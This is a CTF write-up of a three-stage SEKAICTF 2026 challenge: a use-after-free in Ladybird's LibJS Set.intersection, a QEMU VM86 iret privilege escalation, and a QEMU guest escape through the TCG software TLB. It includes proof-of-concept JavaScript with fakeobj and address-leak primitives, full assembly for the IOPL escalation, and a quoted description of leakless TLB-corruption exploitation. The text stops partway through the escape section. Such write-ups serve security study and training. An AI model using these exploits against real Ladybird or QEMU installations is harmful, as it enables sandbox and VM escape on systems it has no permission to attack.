SEKAICTF 2026: 3in1

Jun 29, 2026

A full-chain SEKAICTF 2026 challenge covering Ladybird, a QEMU LPE, and a QEMU escape.

With a clear decline in competitiveness across the board for CTFs now that AI has taken over, we decided to make some harder challenges for this last year. And so I’ve created two challenges for SEKAICTF this year starting with a full chain, combining two 0days and a new way to exploit an n-day with fewer primitives than previous researchers from ottersec.

Components

Ladybird
QEMU LPE
QEMU escape

3in1: Ladybird

Qyn

Jun 29, 2026

#pwn #ctf #sekaictf

Ladybird 0day

The first part of the challenge is to escape the ladybird LibJS shell. This requires a 0day, since we’re running pretty much the latest version. I was planning to do a LibJS challenge for a while now, since I had been hoarding a 0day for over a year (ever since I previously saw a ladybird challenge). But sadly, some time before the CTF started it was patched.

Another funny thing that happened two weeks before the CTF, when the LibJS (/ ladybird) part was already done, was that a commit dropped that killed my original exploitation technique for this new bug.

Bug

So since our last 0day had been patched, we had to find a new one. For the challenge itself, I patched out all the internal functions, except gc() (I was feeling nice), and compiled a JS-only shell.

The intended bug for this challenge lies in Set.intersection:

1
// 24.2.4.9 Set.prototype.intersection ( other ), https://tc39.es/ecma262/#sec-set.prototype.intersection
2
JS_DEFINE_NATIVE_FUNCTION(SetPrototype::intersection)
3
{
4
    auto& realm = *vm.current_realm();
5

6
    // 1. Let O be the this value.
7
    // 2. Perform ? RequireInternalSlot(O, [[SetData]]).
8
    auto set = TRY(typed_this_object(vm));
9

10
    // 3. Let otherRec be ? GetSetRecord(other).
11
    auto other_record = TRY(get_set_record(vm, vm.argument(0)));
12

13
    // 4. Let resultSetData be a new empty List.
14
    auto result = Set::create(realm);
15

16
    // 5. If SetDataSize(O.[[SetData]]) ≤ otherRec.[[Size]], then
17
    if (set->set_size() <= other_record.size) {
18
        // a. Let thisSize be the number of elements in O.[[SetData]].
19
        // b. Let index be 0.
20
        // c. Repeat, while index < thisSize,
21
        for (auto const& element : *set) { // [1]. BUG
22
            // i. Let e be O.[[SetData]][index].
23
            // ii. Set index to index + 1.
24
            // iii. If e is not empty, then
25
            //     1. Let inOther be ToBoolean(? Call(otherRec.[[Has]], otherRec.[[SetObject]], « e »)).
26
            auto in_other = TRY(call(vm, *other_record.has, other_record.set_object, element.key)).to_boolean();
27

28
            //     2. If inOther is true, then
29
            if (in_other) {
30
                // a. NOTE: It is possible for earlier calls to otherRec.[[Has]] to remove and re-add an element of O.[[SetData]], which can cause the same element to be visited twice during this iteration.
31
                // b. If SetDataHas(resultSetData, e) is false, then
32
                if (!set_data_has(result, element.key)) {
33
                    // i. Append e to resultSetData.
34
                    result->set_add(element.key);
35
                }
36
            }
37

38
            //     3. NOTE: The number of elements in O.[[SetData]] may have increased during execution of otherRec.[[Has]].
39
            //     4. Set thisSize to the number of elements in O.[[SetData]].
40
        }
41
    }
42
    // 6. Else,
39 collapsed lines
43
    else {
44
        // a. Let keysIter be ? GetIteratorFromMethod(otherRec.[[SetObject]], otherRec.[[Keys]]).
45
        auto keys_iterator = TRY(get_iterator_from_method(vm, other_record.set_object, other_record.keys));
46

47
        // b. Let next be NOT-STARTED.
48
        Optional<Value> next;
49

50
        // c. Repeat, while next is not DONE,
51
        do {
52
            // i. Set next to ? IteratorStepValue(keysIter).
53
            next = TRY(iterator_step_value(vm, keys_iterator));
54

55
            // ii. If next is not DONE, then
56
            if (next.has_value()) {
57
                // 1. Set next to CanonicalizeKeyedCollectionKey(next).
58
                next = canonicalize_keyed_collection_key(*next);
59

60
                // 2. Let inThis be SetDataHas(O.[[SetData]], next).
61
                auto in_this = set_data_has(set, *next);
62

63
                // 3. If inThis is true, then
64
                if (in_this) {
65
                    // a. NOTE: Because other is an arbitrary object, it is possible for its "keys" iterator to produce the same value more than once.
66

67
                    // b. If SetDataHas(resultSetData, next) is false, then
68
                    if (!set_data_has(result, *next)) {
69
                        // i. Append next to resultSetData.
70
                        result->set_add(*next);
71
                    }
72
                }
73
            }
74
        } while (next.has_value());
75
    }
76

77
    // 7. Let result be OrdinaryObjectCreate(%Set.prototype%, « [[SetData]] »).
78
    // 8. Set result.[[SetData]] to resultSetData.
79

80
    // 9. Return result.
81
    return result;
82
}

The bug here is auto const& element : *set, where element is not a copy, but a reference into the backing store of the set. A Set in LibJS is backed by a Map:

1
class JS_API Set : public Object {
2
    JS_OBJECT(Set, Object);
3
    GC_DECLARE_ALLOCATOR(Set);
4

5
public:
6
    static GC::Ref<Set> create(Realm&);
7

8
    virtual void initialize(Realm&) override;
9
    virtual ~Set() override = default;
10

11
    virtual bool is_set_object() const final { return true; }
12

13
    // NOTE: Unlike what the spec says, we implement Sets using an underlying map,
14
    //       so all the functions below do not directly implement the operations as
15
    //       defined by the specification.
16

17
    void set_clear() { m_values->map_clear(); }
18
    bool set_remove(Value const& value) { return m_values->map_remove(value); }
19
    bool set_has(Value const& key) const { return m_values->map_has(key); }
20
    void set_add(Value const& key) { m_values->map_set(key, js_undefined()); }
21
    size_t set_size() const { return m_values->map_size(); }
22

23
    auto begin() const { return const_cast<Map const&>(*m_values).begin(); }
24
    auto begin() { return m_values->begin(); }
25
    auto end() const { return m_values->end(); }
26

27
    GC::Ref<Set> copy() const;
28

29
private:
30
    explicit Set(Object& prototype);
31

32
    virtual void visit_edges(Visitor& visitor) override;
33

34
    GC::Ptr<Map> m_values;
35
};
36

37
// 24.2.1.1 Set Records, https://tc39.es/ecma262/#sec-set-records
38
struct SetRecord {
39
    GC::Ref<Object const> set_object; // [[SetObject]]
40
    double size { 0 };                // [[Size]
41
    GC::Ref<FunctionObject> has;      // [[Has]]
42
    GC::Ref<FunctionObject> keys;     // [[Keys]]
43
};

Here, Map::clear basically frees its backing HashTable.

So an easy PoC for this is:

1
let key = {};
2
let s = new Set([key]);
3

4
let other = {
5
    size: 1,
6
    has() {
7
        s.clear();   // frees/replaces storage being iterated
8
        return true;
9
    },
10
    keys() {
11
        return [][Symbol.iterator]();
12
    },
13
};
14

15
let result = s.intersection(other);

Note (Where we mimic a set)

1
// 24.2.1.2 GetSetRecord ( obj ), https://tc39.es/ecma262/#sec-getsetrecord
2
ThrowCompletionOr<SetRecord> get_set_record(VM& vm, Value value)
3
{
4
    // 1. If obj is not an Object, throw a TypeError exception.
5
    if (!value.is_object())
6
        return vm.throw_completion<TypeError>(ErrorType::NotAnObject, value);
7
    auto const& object = value.as_object();
8

9
    // 2. Let rawSize be ? Get(obj, "size").
10
    auto raw_size = TRY(object.get(vm.names.size));
11

12
    // 3. Let numSize be ? ToNumber(rawSize).
13
    auto number_size = TRY(raw_size.to_number(vm));
14

15
    // 4. NOTE: If rawSize is undefined, then numSize will be NaN.
16
    // 5. If numSize is NaN, throw a TypeError exception.
17
    if (number_size.is_nan())
18
        return vm.throw_completion<TypeError>(ErrorType::NumberIsNaN, "size"sv);
19

20
    // 6. Let intSize be ! ToIntegerOrInfinity(numSize).
21
    auto integer_size = MUST(number_size.to_integer_or_infinity(vm));
22

23
    // 7. If intSize < 0, throw a RangeError exception.
24
    if (integer_size < 0)
25
        return vm.throw_completion<RangeError>(ErrorType::NumberIsNegative, "size"sv);
26

27
    // 8. Let has be ? Get(obj, "has").
28
    auto has = TRY(object.get(vm.names.has));
29

30
    // 9. If IsCallable(has) is false, throw a TypeError exception.
31
    if (!has.is_function())
32
        return vm.throw_completion<TypeError>(ErrorType::NotAFunction, has);
33

34
    // 10. Let keys be ? Get(obj, "keys").
35
    auto keys = TRY(object.get(vm.names.keys));
36

37
    // 11. If IsCallable(keys) is false, throw a TypeError exception.
38
    if (!keys.is_function())
39
        return vm.throw_completion<TypeError>(ErrorType::NotAFunction, keys);
40

41
    // 12. Return a new Set Record { [[SetObject]]: obj, [[Size]]: intSize, [[Has]]: has, [[Keys]]: keys }.
42
    return SetRecord { .set_object = object, .size = integer_size, .has = has.as_function(), .keys = keys.as_function() };
43
}

Which gives us a free UaF on element.key, which in the case of a Set backed by a Map is the object itself.

Exploit

The first primitive we can easily create from this is fakeobj:

1
function fakeobj(addr) {
2
    let encoded = OBJECT_TAG | (addr & PAYLOAD_MASK);
3
    let payload_b64 = encoded_value_payload(encoded);
4
    let keep = [];
5
    let key = {};
6
    let s = new Set([key]);
7

8
    let other = {
9
        size: 1,
10
        has() {
11
            s.clear();
12

13
            let scratch = new Uint8Array(FAKEOBJ_RECLAIM_SIZE);
14
            let dv = new DataView(scratch.buffer);
15

16
            scratch.setFromBase64(payload_b64);
17
            keep.push(scratch);
18

19
            return true;
20
        },
21
        keys() {
22
            return [][Symbol.iterator]();
23
        }
24
    };
25

26
    return Array.from(s.intersection(other))[0];
27
}

For a leak we do the following:

1
function leak_ptr_try_for(candidates, iter) {
2
    let keep = [];
3
    let set_key = { set_key: iter };
4
    let s = new Set([set_key]);
5

6
    let other = {
7
        size: 1,
8
        has() {
9
            s.clear(); // [1]
10
            gc();
11

12
            for (let j = 0; j < 192; ++j) {
13
                let wm = new WeakMap();
14
                wm.set(candidates[(iter + j) % candidates.length], 0x1337);
15
                keep.push(wm);
16
            }
17

18
            return true;
19
        },
20
        keys() {
21
            return [][Symbol.iterator]();
22
        },
23
    };
24

25
    let v = Array.from(s.intersection(other))[0];
26
    if (typeof v !== "number" || v === 0)
27
        return 0n;
28

29
    let bits = f64_to_u64(v);
30
    if (!looks_like_ptr(bits))
31
        return 0n;
32
    return bits;
33
}

This frees the backing bucket in [1], runs the gc() and creates a WeakMap whose backing store overlaps with the old Set storage.

Just like a regular Set, the backing store of a WeakMap is a HashMap, but in this case: HashMap<GC::Ptr<Cell>, Value> m_values instead of HashMap<Value, Value, ValueTraits> m_entries; for a Map (So a Set as well).

So in this case we try to reclaim a Value from the Set (8 bytes) with a GC::Ptr<Cell> from the WeakMap also 8 bytes (pointer), for which the pointer converted back to a Value is a f64 -> leak.

This basically is our addrOf primitive from which we can target an ArrayBuffer as victim.

From here there are many ways to get r/w into code exec, I’ll give an example:

1
let map = new Map();
2
map.set(bucket0, u64ToF64(MAP_FAKE_HEADER));
3
map.set(bucket1, u64ToF64(validationAddr));
4

5
let iterator = map.entries();
6
iterator.a = u64ToF64(MAP_FAKE_HEADER);

Where bucket0 and bucket1 are chosen so the hashes land in the first and second bucket respectively. Then we try and leak the MapIterator object and interpret like:

Real memory address	Real `MapIterator` field	Fake reader `JS::Object` field
`I + 0x28`	`Object::m_private_elements`	`reader + 0x00` vptr-ish word
`I + 0x30`	`Object::m_inline_named_storage[0] == iterator.a == MAP_FAKE_HEADER`	`reader + 0x08` flags/kind/length
`I + 0x38`	`Object::m_inline_named_storage[1]`	`reader + 0x10 = m_shape`
`I + 0x40`	BuiltinIterator vptr	`reader + 0x18` `m_named_properties`
`I + 0x48`	`MapIterator::m_map`	`reader + 0x20 = m_indexed_elements`
`I + 0x50`	`m_done / m_iteration_kind`	`reader + 0x28 = m_private_elements`
`I + 0x58`	`MapIterator::m_iterator`	`reader + 0x30` inline storage

So now we can read i.e. reader[13] == reader->m_indexed_elements[13] == iterator->m_map[13]. From here we can recover the bucket==reader[13] and read/write into the buckets array. From here we have the following layout:

1
+0x00  bucket0 Entry.key/
2
+0x08  bucket0 Entry.value = header == flags/kind/length
3
+0x10  bucket1 state/hash/padding
4
+0x18  bucket1 Entry.key
5
+0x20  bucket1 Entry.value = target pointer == m_indexed_elements

Then we can fakeobj over the bucket+8 to mirror the MapIterator as previously and get a limited read / write by overwriting the m_indexed_elements using map.set(bucket1, u64ToF64(addr)). From there we repeatedly target an ArrayBuffer’s data pointer to get full a/b r/w. From there we leak the vtable, get libc, read environ, find return address on the stack and ROP to execve and run our next stage.

We use base64 so as not to accidentally reclaim it with other objects ↩

3in1: QEMU LPE

Qyn

Jun 29, 2026

#pwn #ctf #sekaictf

Escalating privileges inside QEMU through a VM86 iret bug.

For the second part of the challenge, we need to somehow gain root (or at least higher privileges) to talk to the virtio-snd device. And because I’ve been hoarding a 0day for this as well for a little bit, it was a perfect fit for this challenge. Although a current 0day has already been published (without patches) by kqx, the challenge introduces a patch and we have to hunt for a new one.

Bug

The bug is actually a slight variant of https://kqx.io/post/qemu-nday/ but the primitive is even better:

1
/* protected mode iret */
2
static inline void helper_ret_protected(CPUX86State *env, int shift,
3
                                        int is_iret, int addend,
4
                                        uintptr_t retaddr)
5
{
34 collapsed lines
6
    uint32_t new_cs, new_eflags, new_ss;
7
    uint32_t new_es, new_ds, new_fs, new_gs;
8
    uint32_t e1, e2, ss_e1, ss_e2;
9
    int cpl, dpl, rpl, eflags_mask, iopl;
10
    target_ulong new_eip, new_esp;
11
    StackAccess sa;
12

13
    cpl = env->hflags & HF_CPL_MASK;
14

15
    sa.env = env;
16
    sa.ra = retaddr;
17
    sa.mmu_index = x86_mmu_index_pl(env, cpl);
18

19
#ifdef TARGET_X86_64
20
    if (shift == 2) {
21
        sa.sp_mask = -1;
22
    } else
23
#endif
24
    {
25
        sa.sp_mask = get_sp_mask(env->segs[R_SS].flags);
26
    }
27
    sa.sp = env->regs[R_ESP];variant
28
    sa.ss_base = env->segs[R_SS].base;
29
    new_eflags = 0; /* avoid warning */
30
#ifdef TARGET_X86_64
31
    if (shift == 2) {
32
        new_eip = popq(&sa);
33
        new_cs = popq(&sa) & 0xffff;
34
        if (is_iret) {
35
            new_eflags = popq(&sa);
36
        }
37
    } else
38
#endif
39
    {
40
        if (shift == 1) {
41
            /* 32 bits */
42
            new_eip = popl(&sa);
43
            new_cs = popl(&sa) & 0xffff;
44
            if (is_iret) {
45
                new_eflags = popl(&sa);
46
                if (new_eflags & VM_MASK) {
47
                    goto return_to_vm86;
48
                }
49
            }
50
        } else {
51
            /* 16 bits */
52
            new_eip = popw(&sa);
53
            new_cs = popw(&sa);
54
            if (is_iret) {
55
                new_eflags = popw(&sa);
56
            }
57
        }
58
    }
142 collapsed lines
59
    LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n",
60
              new_cs, new_eip, shift, addend);
61
    LOG_PCALL_STATE(env_cpu(env));
62
    if ((new_cs & 0xfffc) == 0) {
63
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
64
    }
65
    if (load_segment_ra(env, &e1, &e2, new_cs, retaddr) != 0) {
66
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
67
    }
68
    if (!(e2 & DESC_S_MASK) ||
69
        !(e2 & DESC_CS_MASK)) {
70
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
71
    }
72
    rpl = new_cs & 3;
73
    if (rpl < cpl) {
74
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
75
    }
76
    dpl = (e2 >> DESC_DPL_SHIFT) & 3;
77
    if (e2 & DESC_C_MASK) {
78
        if (dpl > rpl) {
79
            raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
80
        }
81
    } else {
82
        if (dpl != rpl) {
83
            raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
84
        }
85
    }
86
    if (!(e2 & DESC_P_MASK)) {
87
        raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, retaddr);
88
    }
89

90
    sa.sp += addend;
91
    if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) ||
92
                       ((env->hflags & HF_CS64_MASK) && !is_iret))) {
93
        /* return to same privilege level */
94
        cpu_x86_load_seg_cache(env, R_CS, new_cs,
95
                       get_seg_base(e1, e2),
96
                       get_seg_limit(e1, e2),
97
                       e2);
98
    } else {
99
        /* return to different privilege level */
100
#ifdef TARGET_X86_64
101
        if (shift == 2) {
102
            new_esp = popq(&sa);
103
            new_ss = popq(&sa) & 0xffff;
104
        } else
105
#endif
106
        {
107
            if (shift == 1) {
108
                /* 32 bits */
109
                new_esp = popl(&sa);
110
                new_ss = popl(&sa) & 0xffff;
111
            } else {
112
                /* 16 bits */
113
                new_esp = popw(&sa);
114
                new_ss = popw(&sa);
115
            }
116
        }
117
        LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n",
118
                  new_ss, new_esp);
119
        if ((new_ss & 0xfffc) == 0) {
120
#ifdef TARGET_X86_64
121
            /* NULL ss is allowed in long mode if cpl != 3 */
122
            /* XXX: test CS64? */
123
            if ((env->hflags & HF_LMA_MASK) && rpl != 3) {
124
                cpu_x86_load_seg_cache(env, R_SS, new_ss,
125
                                       0, 0xffffffff,
126
                                       DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
127
                                       DESC_S_MASK | (rpl << DESC_DPL_SHIFT) |
128
                                       DESC_W_MASK | DESC_A_MASK);
129
                ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */
130
            } else
131
#endif
132
            {
133
                raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr);
134
            }
135
        } else {
136
            if ((new_ss & 3) != rpl) {
137
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
138
            }
139
            if (load_segment_ra(env, &ss_e1, &ss_e2, new_ss, retaddr) != 0) {
140
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
141
            }
142
            if (!(ss_e2 & DESC_S_MASK) ||
143
                (ss_e2 & DESC_CS_MASK) ||
144
                !(ss_e2 & DESC_W_MASK)) {
145
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
146
            }
147
            dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3;
148
            if (dpl != rpl) {
149
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
150
            }
151
            if (!(ss_e2 & DESC_P_MASK)) {
152
                raise_exception_err_ra(env, EXCP0B_NOSEG, new_ss & 0xfffc, retaddr);
153
            }
154
            cpu_x86_load_seg_cache(env, R_SS, new_ss,
155
                                   get_seg_base(ss_e1, ss_e2),
156
                                   get_seg_limit(ss_e1, ss_e2),
157
                                   ss_e2);
158
        }
159

160
        cpu_x86_load_seg_cache(env, R_CS, new_cs,
161
                       get_seg_base(e1, e2),
162
                       get_seg_limit(e1, e2),
163
                       e2);
164
        sa.sp = new_esp;
165
#ifdef TARGET_X86_64
166
        if (env->hflags & HF_CS64_MASK) {
167
            sa.sp_mask = -1;
168
        } else
169
#endif
170
        {
171
            sa.sp_mask = get_sp_mask(ss_e2);
172
        }
173

174
        /* validate data segments */
175
        validate_seg(env, R_ES, rpl);
176
        validate_seg(env, R_DS, rpl);
177
        validate_seg(env, R_FS, rpl);
178
        validate_seg(env, R_GS, rpl);
179

180
        sa.sp += addend;
181
    }
182
    SET_ESP(sa.sp, sa.sp_mask);
183
    env->eip = new_eip;
184
    if (is_iret) {
185
        /* NOTE: 'cpl' is the _old_ CPL */
186
        eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK;
187
        if (cpl == 0) {
188
            eflags_mask |= IOPL_MASK;
189
        }
190
        iopl = (env->eflags >> IOPL_SHIFT) & 3;
191
        if (cpl <= iopl) {
192
            eflags_mask |= IF_MASK;
193
        }
194
        if (shift == 0) {
195
            eflags_mask &= 0xffff;
196
        }
197
        cpu_load_eflags(env, new_eflags, eflags_mask);
198
    }
199
    return;
200

201
 return_to_vm86:
202
    new_esp = popl(&sa);
203
    new_ss = popl(&sa);
204
    new_es = popl(&sa);
205
    new_ds = popl(&sa);
206
    new_fs = popl(&sa);
207
    new_gs = popl(&sa);
208

209
    /* modify processor state */
210
    cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK |
211
                    IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK |
212
                    VIP_MASK);
213
    load_seg_vm(env, R_CS, new_cs & 0xffff);
214
    load_seg_vm(env, R_SS, new_ss & 0xffff);
215
    load_seg_vm(env, R_ES, new_es & 0xffff);
216
    load_seg_vm(env, R_DS, new_ds & 0xffff);
217
    load_seg_vm(env, R_FS, new_fs & 0xffff);
218
    load_seg_vm(env, R_GS, new_gs & 0xffff);
219

220
    env->eip = new_eip & 0xffff;
221
    env->regs[R_ESP] = new_esp;
222
}

The issue here is that QEMU jumps to return_to_vm86 as soon as EFLAGS.VM is set, before rejecting this transition from usermode. return_to_vm86 then just loads the EFLAGS with VM_MASK and IOPL_MASK allowed, so we can add IOPL=3 which in qemu gives a/b physical r/w again, amazing work from the kqx people.

Exploit

It’s easier to show the full exploit path to show what is happening:

1
; ============================================================
2
; Stage 0: normal 64-bit userland
3
; CS = 0x33, RIP = inside child_iopl_probe()
4
; ============================================================
5

6
pushq 0x23              ; USER32_CS, Linux 32-bit compat code selector
7
pushq 0x00100000        ; 32-bit entrypoint
8
lretq                   ; far return: pop RIP/EIP + CS
9

10
; Now:
11
;   CS  = 0x23
12
;   EIP = 0x00100000
13
; Execution is 32-bit compat code.
14

15

16
; ============================================================
17
; Stage 1: 32-bit compat stub at 0x00100000
18
; ============================================================
19

20
[BITS 32]
21
mov esp, 0x00022000
22

23
push 0x00001000         ; GS for VM86
24
push 0x00001000         ; FS for VM86
25
push 0x00001000         ; DS for VM86
26
push 0x00001000         ; ES for VM86
27
push 0x00002000         ; SS for VM86
28
push 0x00008000         ; ESP for VM86
29
push 0x00023002         ; EFLAGS: VM=1, IOPL=3, bit1=1
30
push 0x00001000         ; CS for VM86
31
push 0x00000000         ; EIP for VM86
32
iretd                   ; opcode 0xcf
33

34
; QEMU sees VM=1 in the iret frame and takes return_to_vm86
35
; which loads IOPL from attacker-controlled EFLAGS
36
;
37
; Now:
38
;   VM86 mode
39
;   CS:IP = 0x1000:0x0000
40
;   linear RIP = 0x10000
41
;   SS:SP = 0x2000:0x8000
42
;   EFLAGS has IOPL=3
43

44

45
; ============================================================
46
; Stage 2: VM86 code at 0x00010000
47
; ============================================================
48

49
[BITS 16]
50
mov ax, 0x3000
51
mov ds, ax              ; DS base = 0x3000 << 4 = 0x30000
52

53
o32 mov eax, 20         ; i386 syscall number 20 = getpid
54
o32 mov ebp, 0x00028100 ; landing_stack
55
o32 mov esp, 0x00028100 ; landing_stack
56

57
sysenter                ; enter Linux compat syscall path
58

59

60
; ============================================================
61
; Stage 3: Linux compat sysenter return path
62
; It returns to a patched vDSO landing pad.
63
; we overwrite that pad with:
64
; ============================================================
65

66
[BITS 32]
67
pop ebp                 ; consumes 0x41414141
68
pop edx                 ; consumes 0x42424242
69
pop ecx                 ; consumes 0x43434343
70
ret                     ; returns to after32
71

72
; landing_stack contains:
73
;   [0x28100] = 0x41414141
74
;   [0x28104] = 0x42424242
75
;   [0x28108] = 0x43434343
76
;   [0x2810c] = after32
77

78

79
; ============================================================
80
; Stage 4: after32, same linear page, now 32-bit compat mode
81
; ============================================================
82

83
[BITS 32]
84
mov ax, 0x2b            ; USER_DS
85
mov ds, ax
86

87
pushfd
88
pop eax
89

90
push 0x33               ; USER64_CS
91
push 0x00101000         ; 64-bit stub address
92
retf                    ; far return back to 64-bit user code
93

94
; Now:
95
;   CS  = 0x33
96
;   RIP = 0x00101000
97

98

99
; ============================================================
100
; Stage 5: 64-bit stub at 0x00101000
101
; ============================================================
102

103
[BITS 64]
104
mov rsp, safe_rsp
105
mov rax, after_iopl
106
jmp rax
107

108

109
; ============================================================
110
; Stage 6: normal 64-bit C again, but with IOPL=3
111
; ============================================================
112

113
pushfq
114
pop rax
115

116
cli
117
sti                     ; succeeds only if IOPL=3

After which we use the kqx.io technique to obtain physical r/w.

Aftermath

After the CTF I was told that there was some public work on this bug specifically https://patchew.org/QEMU/20260528113808.86036-1-misetic@osec.io/ and https://lore.kernel.org/qemu-devel/20260622082119.11903-1-apolivodaa433@gmail.com/

Thankfully the bug wasn’t patched in time for the CTF :)

3in1: QEMU Escape

Qyn

Jun 29, 2026

#pwn #ctf #sekaictf

Escaping QEMU by targeting the TCG software TLB from virtio-snd.

Finally we get to exploit QEMU. A different patch reintroduces a bug previously exploited by ottersec. Before reading through the next part, I recommend reading through their writeup to get an understanding of the problem, as I’ll just go over the exploitation of that bug.

Anyway, ottersec needed another device driver to escape the guest. This challenge doesn’t give you this luxury and you have to exploit (escape) the guest without it.

Another fun thing about this challenge is that the kernel is minimally compiled and doesn’t expose any functionality required to actually talk to the driver. You have to create this yourself (if you even need it! More on this later).

For this challenge, I’ll go over two ways to exploit this: the originally intended path and another (less intended) path created by an unnamed entity during the game that just happened to fall into my hands.

Intended Exploit

First of all, credit for the exploitation idea comes from dicectf bassoon:

Note (Bassoon writeup)

first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don’t have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.

there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can’t control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.

there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running usermode code through SMAP. you could simplify the exploitation by doing it all through one mmu_idx so you don’t need to context switch to trigger TLB activity between invlpg’ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.

we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can’t control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it’s a pretty cool and novel technique.

the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.

so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.

all of the past qemu exploits i’ve seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it’s cool that it’s theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i’ll try this challenge again but with KVM and see if it’s still possible.

The compiled kernel doesn’t expose much, if anything, to interact with the device, so my solver patches in a couple of utilities using the physical r/w:

virtual to physical
remapping a userspace virtual page to an arbitrary guest physical 4k page
install a 2MiB page-table mapping
invlpg
(setuid)

TLB / Target

So a quick background recap on the TLB cache: a normal CPU has a Translation Lookaside Buffer, or TLB. It is a cache for page table translations. Instead of walking page tables on every memory access, the CPU remembers that a virtual page recently translated to a particular physical page with particular permissions. Say:

virtual address
      |
      v
TLB lookup: virtual page -> physical page + permissions
      |
      v
memory access

When an operating system changes page tables, old cached translations may no longer be correct. A TLB flush invalidates those cached translations. On x86, invlpg addr invalidates the cached translation for one virtual page, while operations such as CR3 reloads can invalidate many entries.

In this exploit, however, the interesting TLB is not the host CPU’s hardware TLB. The interesting object is QEMU TCG’s software TLB. TCG-generated host code also wants memory accesses to be fast, so QEMU keeps its own cache of guest virtual address translations. That cache lives in normal QEMU heap memory. For a guest RAM access in system emulation, the path is roughly:

guest virtual address
      |
      v
QEMU TCG software TLB lookup
      |
      +-- hit  -> host pointer = guest address + entry.addend
      |
      +-- miss -> slow path walks guest page tables, fills TLB entry

The fast entry type is CPUTLBEntry:


3 collapsed lines
1
#define CPU_TLB_ENTRY_BITS (HOST_LONG_BITS == 32 ? 4 : 5)
2

3
/* Minimalized TLB entry for use by TCG fast path. */
4
typedef union CPUTLBEntry {
5
    struct {
6
        uintptr_t addr_read;
7
        uintptr_t addr_write;
8
        uintptr_t addr_code;
9
        /*
10
         * Addend to virtual address to get host address.  IO accesses
11
         * use the corresponding iotlb value.
12
         */
13
        uintptr_t addend;
14
    };
5 collapsed lines
15
    /*
16
     * Padding to get a power of two size, as well as index
17
     * access to addr_{read,write,code}.
18
     */
19
    uintptr_t addr_idx[(1 << CPU_TLB_ENTRY_BITS) / sizeof(uintptr_t)];
20
} CPUTLBEntry;
21

22
QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS));

The three addr_* fields are compare values for read, write, and instruction fetch accesses. The addend is the part that turns a guest virtual address into a host pointer:

1
/* Everything else is RAM. */
2
*phost = (void *)((uintptr_t)addr + entry->addend);
3
return flags;

So this is a good primitive to target, since it directly decides which host address QEMU reads or writes. The lookup table is indexed by the guest virtual page:

1
static inline uintptr_t tlb_index(CPUState *cpu, uintptr_t mmu_idx,
2
                                  vaddr addr)
3
{
4
    uintptr_t size_mask = cpu_tlb_fast(cpu, mmu_idx)->mask >> CPU_TLB_ENTRY_BITS;
5

6
    return (addr >> TARGET_PAGE_BITS) & size_mask;
7
}

For the minimum table size used later, there are 64 entries, so the mask is 0x3f. Guest address 0 and guest address 0x8000000 both land in index 0:

(0x0       >> 12) & 0x3f = 0
